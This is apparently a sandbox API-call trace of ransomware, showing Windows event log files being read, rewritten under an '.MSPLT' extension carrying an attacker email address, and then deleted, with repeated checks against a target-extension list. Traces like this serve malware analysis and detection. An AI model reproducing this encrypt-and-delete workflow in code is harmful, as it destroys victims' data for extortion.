40 [0292.518] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0292.520] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0292.520] CloseHandle (hObject=0x434) returned 1 [0292.520] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx")) returned 0x20 [0292.520] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.520] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0292.520] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.520] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.521] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0292.521] GetLastError () returned 0x0 [0292.521] ReadFile (in: hFile=0x434, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0292.681] WriteFile (in: hFile=0x43c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0292.684] ReadFile (in: hFile=0x434, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.684] WriteFile (in: hFile=0x43c, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x124, lpOverlapped=0x0) returned 1 [0292.684] SetEndOfFile (hFile=0x43c) returned 1 [0292.704] CloseHandle (hObject=0x43c) returned 1 [0292.709] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.709] SetEndOfFile (hFile=0x434) returned 1 [0292.710] CloseHandle (hObject=0x434) returned 1 [0292.711] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0292.711] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx")) returned 1 [0292.720] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0292.720] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0292.720] lstrlenW (lpString=".doc") returned 4 [0292.720] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.720] lstrlenW (lpString=".docx") returned 5 [0292.720] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.720] lstrlenW (lpString=".pdf") returned 4 [0292.720] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.721] lstrlenW (lpString=".xls") returned 4 [0292.721] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.721] lstrlenW (lpString=".xlsx") returned 5 [0292.721] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.721] lstrlenW (lpString=".ppt") returned 4 [0292.721] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.721] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0292.721] lstrlenW (lpString=".zip") returned 4 [0292.721] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.721] lstrlenW (lpString=".rar") returned 4 [0292.721] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.721] lstrlenW (lpString=".bz2") returned 4 [0292.721] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.721] lstrlenW (lpString=".7z") returned 3 [0292.721] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.721] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0292.721] lstrlenW (lpString=".dbf") returned 4 [0292.721] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.721] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0292.721] lstrlenW (lpString=".1cd") returned 4 [0292.721] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.721] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0292.721] lstrlenW (lpString=".jpg") returned 4 [0292.721] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.721] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0292.722] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0292.722] lstrlenW (lpString=".doc") returned 4 [0292.722] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.722] lstrlenW (lpString=".docx") returned 5 [0292.722] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.722] lstrlenW (lpString=".pdf") returned 4 [0292.722] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.722] lstrlenW (lpString=".xls") returned 4 [0292.722] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.722] lstrlenW (lpString=".xlsx") returned 5 [0292.722] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.722] lstrlenW (lpString=".ppt") returned 4 [0292.722] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.722] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0292.722] lstrlenW (lpString=".zip") returned 4 [0292.722] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.722] lstrlenW (lpString=".rar") returned 4 [0292.722] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.722] lstrlenW (lpString=".bz2") returned 4 [0292.722] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.722] lstrlenW (lpString=".7z") returned 3 [0292.722] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.722] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0292.722] lstrlenW (lpString=".dbf") returned 4 [0292.722] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.722] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0292.722] lstrlenW (lpString=".1cd") returned 4 [0292.723] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.723] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 48 [0292.723] lstrlenW (lpString=".jpg") returned 4 [0292.723] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.723] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0292.723] lstrlenW (lpString="Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 46 [0292.723] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0292.880] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0292.880] CloseHandle (hObject=0x484) returned 1 [0292.881] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx")) returned 0x20 [0292.881] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.881] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0292.881] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.881] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.881] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0292.882] GetLastError () returned 0x0 [0292.882] ReadFile (in: hFile=0x484, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0292.887] WriteFile (in: hFile=0x434, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0292.890] ReadFile (in: hFile=0x484, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.890] WriteFile (in: hFile=0x434, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x130, lpOverlapped=0x0) returned 1 [0292.890] SetEndOfFile (hFile=0x434) returned 1 [0292.890] CloseHandle (hObject=0x434) returned 1 [0292.911] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.912] SetEndOfFile (hFile=0x484) returned 1 [0292.913] CloseHandle (hObject=0x484) returned 1 [0292.913] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0292.913] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx")) returned 1 [0292.914] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0292.914] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0292.914] lstrlenW (lpString=".doc") returned 4 [0292.914] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.914] lstrlenW (lpString=".docx") returned 5 [0292.914] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.914] lstrlenW (lpString=".pdf") returned 4 [0292.914] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.914] lstrlenW (lpString=".xls") returned 4 [0292.914] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.914] lstrlenW (lpString=".xlsx") returned 5 [0292.914] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.914] lstrlenW (lpString=".ppt") returned 4 [0292.914] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.914] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0292.914] lstrlenW (lpString=".zip") returned 4 [0292.914] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.914] lstrlenW (lpString=".rar") returned 4 [0292.914] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.914] lstrlenW (lpString=".bz2") returned 4 [0292.914] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.914] lstrlenW (lpString=".7z") returned 3 [0292.914] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.914] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0292.914] lstrlenW (lpString=".dbf") returned 4 [0292.914] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.914] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0292.914] lstrlenW (lpString=".1cd") returned 4 [0292.914] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.914] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0292.915] lstrlenW (lpString=".jpg") returned 4 [0292.915] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.915] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0292.915] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0292.915] lstrlenW (lpString=".doc") returned 4 [0292.915] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.915] lstrlenW (lpString=".docx") returned 5 [0292.915] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.915] lstrlenW (lpString=".pdf") returned 4 [0292.915] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.915] lstrlenW (lpString=".xls") returned 4 [0292.915] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.915] lstrlenW (lpString=".xlsx") returned 5 [0292.915] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.915] lstrlenW (lpString=".ppt") returned 4 [0292.915] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.915] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0292.915] lstrlenW (lpString=".zip") returned 4 [0292.915] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.915] lstrlenW (lpString=".rar") returned 4 [0292.915] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.915] lstrlenW (lpString=".bz2") returned 4 [0292.915] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.915] lstrlenW (lpString=".7z") returned 3 [0292.915] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.915] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0292.915] lstrlenW (lpString=".dbf") returned 4 [0292.915] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.915] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0292.915] lstrlenW (lpString=".1cd") returned 4 [0292.915] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.915] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0292.916] lstrlenW (lpString=".jpg") returned 4 [0292.916] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.916] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0292.916] lstrlenW (lpString="Microsoft-Windows-SettingSync%4Operational.evtx") returned 47 [0292.916] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0292.916] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0292.916] CloseHandle (hObject=0x484) returned 1 [0292.922] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx")) returned 0x20 [0292.922] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.922] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0292.923] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.923] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.923] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0292.924] GetLastError () returned 0x0 [0292.924] ReadFile (in: hFile=0x484, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0292.930] WriteFile (in: hFile=0x434, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0292.933] ReadFile (in: hFile=0x484, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.934] WriteFile (in: hFile=0x434, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x132, lpOverlapped=0x0) returned 1 [0292.934] SetEndOfFile (hFile=0x434) returned 1 [0292.934] CloseHandle (hObject=0x434) returned 1 [0292.940] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.940] SetEndOfFile (hFile=0x484) returned 1 [0292.942] CloseHandle (hObject=0x484) returned 1 [0292.942] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0293.321] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx")) returned 1 [0293.433] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0293.433] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0293.433] lstrlenW (lpString=".doc") returned 4 [0293.433] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.433] lstrlenW (lpString=".docx") returned 5 [0293.433] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.433] lstrlenW (lpString=".pdf") returned 4 [0293.433] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.433] lstrlenW (lpString=".xls") returned 4 [0293.433] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.433] lstrlenW (lpString=".xlsx") returned 5 [0293.433] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.433] lstrlenW (lpString=".ppt") returned 4 [0293.433] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.433] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0293.433] lstrlenW (lpString=".zip") returned 4 [0293.433] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.433] lstrlenW (lpString=".rar") returned 4 [0293.433] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.433] lstrlenW (lpString=".bz2") returned 4 [0293.433] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.433] lstrlenW (lpString=".7z") returned 3 [0293.433] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.433] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0293.434] lstrlenW (lpString=".dbf") returned 4 [0293.434] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.434] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0293.434] lstrlenW (lpString=".1cd") returned 4 [0293.434] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.434] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0293.434] lstrlenW (lpString=".jpg") returned 4 [0293.434] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.434] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0293.434] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0293.434] lstrlenW (lpString=".doc") returned 4 [0293.434] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.434] lstrlenW (lpString=".docx") returned 5 [0293.434] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.434] lstrlenW (lpString=".pdf") returned 4 [0293.434] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.434] lstrlenW (lpString=".xls") returned 4 [0293.434] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.434] lstrlenW (lpString=".xlsx") returned 5 [0293.434] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.434] lstrlenW (lpString=".ppt") returned 4 [0293.434] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.434] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0293.434] lstrlenW (lpString=".zip") returned 4 [0293.434] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.434] lstrlenW (lpString=".rar") returned 4 [0293.434] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.434] lstrlenW (lpString=".bz2") returned 4 [0293.434] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.435] lstrlenW (lpString=".7z") returned 3 [0293.435] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.435] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0293.435] lstrlenW (lpString=".dbf") returned 4 [0293.435] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.435] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0293.435] lstrlenW (lpString=".1cd") returned 4 [0293.435] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.435] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0293.435] lstrlenW (lpString=".jpg") returned 4 [0293.435] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.435] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0293.435] lstrlenW (lpString="Microsoft-Windows-SmbClient%4Security.evtx") returned 42 [0293.435] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0293.606] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0293.606] CloseHandle (hObject=0x464) returned 1 [0293.606] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx")) returned 0x20 [0293.607] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0293.607] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0293.607] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.607] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.607] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0293.620] GetLastError () returned 0x0 [0293.620] ReadFile (in: hFile=0x464, lpBuffer=0x3ca8020, 